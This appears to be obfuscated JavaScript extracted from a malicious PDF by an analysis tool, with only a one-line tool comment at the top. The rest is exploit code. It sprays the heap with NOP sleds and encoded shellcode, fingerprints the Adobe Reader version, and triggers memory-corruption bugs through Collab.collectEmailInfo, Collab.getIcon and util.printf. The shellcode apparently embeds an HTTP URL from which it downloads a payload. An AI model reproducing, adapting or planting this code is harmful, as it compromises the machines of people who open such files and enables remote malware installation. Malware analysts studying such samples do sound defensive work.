// peepdf comment: Javascript code located in object 7 (version 0)

var xyutequex = false;
var wochechuc = new Array();

function hethithyq() {}
function wexyixyat() {}
var thexye;

function cazethexy(cazethexy) {
    return true;
}
this.pecuwo = 24560;

function kazuq(mochyb, fabaquochu) {
    function thith(thith) {
        return thith;
    }
    while (mochyb.length * 2 < fabaquochu) mochyb += mochyb;
    this.quynopaque = 'quynopaque';
    mochyb = mochyb.substring(0, fabaquochu / 2);

    function natoj(natoj) {
        return natoj;
    }
    return mochyb;
}
this.laxyeth = false;

function tychux(gabuz) {
    var nithochyp = false;
    var xyicedax = 0x0c0c0c0c;
    var queth = false;
    var cotuchuvuq = false;
    var xyymichan = new Array('%u4343', '%u4343%', 'u4343', '%u0FEB%u', '335B%u', '66C9%u8', '0B9%u80', '01%uE', 'F33%uE2', '43%uEBF', 'A%uE8', '05%uFF', 'EC%uFF', 'FF%u8', 'B7F%u', 'DF4E%uEF', 'EF%u64EF', '%uE3A', 'F%u9F64', '%u42F3%u', '9F64%', 'u6EE7', '%uEF0', '3%uEF', 'EB%u64', 'EF%uB', '903%u61', '87%uE1A', '1%u070', '3%uEF', '11%uEFEF', '%uAA66%u', 'B9EB%u7', '787%u65', '11%u0', '7E1%u', 'EF1F%uE', 'FEF%uAA6', '6%uB9E7', '%uCA87%', 'u105F', '%u072D%u', 'EF0D%u', 'EFEF%uA', 'A66%u', 'B9E3%u00', '87%u0', 'F21%u', '078F%uE', 'F3B%uEFE', 'F%uAA6', '6%uB9', 'FF%u2E', '87%u0', 'A96%u07', '57%uEF29', '%uEFEF', '%uAA66%u', 'AFFB%uD7', '6F%u9A2', 'C%u6615', '%uF7AA%u', 'E806%', 'uEFEE%', 'uB1EF', '%u9A66%', 'u64CB%', 'uEBAA%uE', 'E85%u', '64B6%uF', '7BA%u07B', '9%uEF64', '%uEFEF%u', '87BF%uF', '5D9%u9FC', '0%u7807%', 'uEFEF%u6', '6EF%u', 'F3AA%u2', 'A64%u2F6', 'C%u66BF', '%uCFAA%', 'u1087%u', 'EFEF%uBF', 'EF%uAA6', '4%u85', 'FB%uB6E', 'D%uBA64%', 'u07F7%u', 'EF8E%uEF', 'EF%uAA', 'EC%u28C', 'F%uB3', 'EF%uC191', '%u288A', '%uEBAF%', 'u8A97%uE', 'FEF%u', '9A10%u6', '4CF%uE3', 'AA%uEE85', '%u64B6', '%uF7BA%u', 'AF07%uEF', 'EF%u8', '5EF%uB', '7E8%uA', 'AEC%uDC', 'CB%uB', 'C34%u10B', 'C%uCF9', 'A%uBC', 'BF%uAA', '64%u85F3', '%uB6EA%u', 'BA64%u0', '7F7%uEF', 'CC%uEFE', 'F%uEF85', '%u9A1', '0%u64', 'CF%uE7A', 'A%uED85%', 'u64B6%u', 'F7BA%uF', 'F07%u', 'EFEF%u', '85EF%u64', '10%uFFAA', '%uEE8', '5%u64B6', '%uF7BA', '%uEF07%', 'uEFEF%uA', 'EEF%uBDB', '4%u0EEC', '%u0EEC', '%u0EEC', '%u0EEC%u', '036C%uB', '5EB%u64B', 'C%u0D35%', 'uBD18', '%u0F10', '%u64BA%', 'u6403', '%uE792%u', 'B264%u', 'B9E3%u', '9C64%u64', 'D3%uF19', 'B%uEC9', '7%uB91', 'C%u9964%', 'uECCF%', 'uDC1C%', 'uA626', '%u42AE%u', '2CEC%u', 'DCB9%u', 'E019%uFF', '51%u1', 'DD5%uE', '79B%u212', 'E%uECE', '2%uAF1', 'D%u1E04', '%u11D4%u', '9AB1%uB', '50A%u0', '464%uB5', '64%uEC', 'CB%u8932', '%uE364%', 'u64A4%u', 'F3B5%u32', 'EC%uEB64', '%uEC64%', 'uB12A%u', '2DB2%', 'uEFE7%u', '1B07%u', '1011%', 'uBA10', '%uA3B', 'D%uA0', 'A2%uE', 'FA1%u', '7468%u', '7074%u2', 'F3A%u772', 'F%u7777%', 'u652E%u', '6176%u67', '6E%u6', 'C65%u73', '69%u686', '3%u692D', '%u2D6E%', 'u6172%', 'u6874%', 'u642E%u', '2F65%u61', '6C%u64', '6E%u6E6', '9%u2F67%', 'u7865', '%u2E65%', 'u6870%u', '3F70%u', '3D78%u6', '470%u0', '066');

    function kychojop(kychojop) {
        return true;
    }
    xyythoch = xyymichan.join("");
    var quachytho = 9814;
    var thicho = 'thicho';
    var quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);

    function cytichich(cytichich) {
        return cytichich;
    }
    var xyewud = 13398;
    if (gabuz == 1) {
        this.choxye = false;
        xyicedax = 0x30303030;

        function pedip(pedip) {
            return true;
        }
        quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);
        this.chevyfemaq = "chevyfemaq";
    } else if (gabuz == 2) {
        var xyajy = 'xyajy';
        quafynuquo = eval("une" + "sca" + "pe" + "")(xyythoch);

        function xyisupody(xyisupody) {
            return true;
        }
    }
    var cyquelejaq = false;

    function thochy() {}
    this.jogixyu = 1171;
    var quovequiva = 0x400000;
    var parethece = false;
    var rycofychum = quafynuquo.length * 2;
    this.xyycha = false;
    var fabaquochu = quovequiva - (rycofychum + 0x38);
    this.fucaquich = 'fucaquich';
    var mochyb = eval("une" + "sca" + "pe" + "")("%u909" + "0%u90" + "90" + "");

    function wecaxya(wecaxya) {
        return true;
    }
    mochyb = kazuq(mochyb, fabaquochu);

    function chequoc() {}
    var bijuja = (xyicedax - 0x400000) / quovequiva;
    this.thyque = 'thyque';
    for (var zeduxy = 0; zeduxy < bijuja; zeduxy++) wochechuc[zeduxy] = mochyb + quafynuquo;

    function quesuz(quesuz) {
        return true;
    }
}
function xyejywed() {
    var xyixyuquac = 'xyixyuquac';
    var micachy = 0;
    this.chuthoc = "chuthoc";
    var kaxyucochi = app.viewerVersion.toString();

    function quothete(quothete) {
        return true;
    }
    app.clearTimeOut(thexye);
    this.chahach = "chahach";
    if ((kaxyucochi >= 8 && kaxyucochi < 8.102) || kaxyucochi < 7.1) {
        this.quakaxyi = false;
        tychux(0);

        function xyuchonyq(xyuchonyq) {
            return true;
        }
        var requochos = unescape("%u" + "0c" + "0c" + "%u" + "0c" + "0c" + "");
        var xyimy = 21631;
        while (requochos.length < 0xaf98) requochos += requochos;
        var xyeth = false;
        eval("this")["co" + "ll" + "ab" + "St" + "or" + "e" + ""] = eval("Col" + "lab" + "")["co" + "ll" + "ec" + "tE" + "ma" + "il" + "In" + "fo" + ""]({
            subj: "dilyxyyqu",
            msg: requochos
        });
        var jequed = 'jequed';
    }
    if ((kaxyucochi >= 8.102 && kaxyucochi < 8.104) || (kaxyucochi >= 9 && kaxyucochi < 9.1) || kaxyucochi <= 7.101) {
        try {
            if (app["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["get" + "Ico" + "n" + ""]) {
                function dachi(dachi) {
                    return dachi;
                }
                tychux(2);
                this.thexyi = "thexyi";
                var dumizec = eval("un" + "es" + "ca" + "pe" + "")("%09");
                var masyxyuch = 'masyxyuch';
                this.xyychy = 'xyychy';
                while (dumizec.length < 0x4000) dumizec += dumizec;
                this.xyyxyas = 11155;
                dumizec = "N." + dumizec;

                function chiquuchib(chiquuchib) {
                    return true;
                }
                eval("ap" + "p" + "")["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["ge" + "tI" + "co" + "n" + ""](dumizec);
                var thada = 'thada';
                micachy = 1;

                function xyuchocho(xyuchocho) {
                    return true;
                }
            } else micachy = 1;
        } catch (e) {
            micachy = 1;
        }
        if (micachy == 1) {
            if (kaxyucochi == 8.102 || kaxyucochi == 7.1) {
                tychux(1);
                this.dykexy = 15280;
                var tyxyecechi = 12954;
                eval("ut" + "il" + "")["pri" + "ntf" + ""]("%4" + "50" + "00" + "f" + "", "1299999999999999" + "9999888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "88888888" + "");
            }
        }
    }
}
app.chiny = xyejywed;

function noquifyqu(noquifyqu) {
    return noquifyqu;
}
thexye = app.setTimeOut("app.chiny()", 10);

